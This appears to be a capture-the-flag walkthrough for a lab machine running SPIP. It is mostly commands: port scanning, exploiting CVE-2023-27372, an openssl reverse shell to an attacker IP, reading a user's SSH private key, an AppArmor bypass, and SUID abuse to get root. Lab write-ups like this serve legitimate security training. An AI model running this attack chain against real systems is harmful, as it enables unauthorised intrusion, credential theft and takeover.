Let's see what ports are open -
nmap -sVC -T4 10.10.210.141
Nmap scan report for 10.10.210.141
Host is up (0.20s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_ 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Publisher's Pulse: SPIP Insights & Tips
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
As per hint in description of the challenge, we will search for RCE Exploit for Spip
searchsploit spip
SPIP v4.2.0 - Remote Code Execution (Unauthenticated) | php/webapps/51536.py
We will use this github exploit to get the initial foothold - CVE-2023-27372
git clone https://github.com/0SPwn/CVE-2023-27372-PoC
cd CVE-2023-27372-PoC
pip install -r requirements.txt
python3 exploit.py -u "http://10.10.210.141/spip/spip.php?page=spip_pass&lang=fr"
Getting reverse shell on nc
using openssl
on attacker -
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 1337
on victim -
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.8.47.242:1337 > /tmp/s; rm /tmp/s
stablize it -
script -qc /bin/bash /dev/null
OR
Copy id_rsa
of think user
cat /home/think/.ssh/id_rsa
Privesc To Root -
Bypass App Armor using perl bypass
- HackTricks App Armor
echo '#!/usr/bin/perl
use POSIX qw(strftime);
use POSIX qw(setuid);
POSIX::setuid(0);
exec "/bin/sh"' > /dev/shm/test.pl
chmod +x /dev/shm/test.pl
/dev/shm/test.pl
SUID /usr/sbin/run_container
-
find / -perm /4000 2>/dev/null
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/sbin/pppd
/usr/sbin/run_container <-----
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount
Running /usr/sbin/run_container
think@publisher:~$ run_container
List of Docker containers:
ID: 41c976e507f8 | Name: jovial_hertz | Status: Up 17 minutes
Enter the ID of the container or leave blank to create a new one: 41c976e507f8
/opt/run_container.sh: line 16: validate_container_id: command not found <---------
OPTIONS:
1) Start Container
2) Stop Container
3) Restart Container
4) Create Container
5) Quit
Choose an action for a container:
Editing /opt/run_
container.sh
to get root
cp /usr/bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
/usr/sbin/run_container
41c976e507f8
3
/tmp/rootbash -p
bash-5.0# whoami
root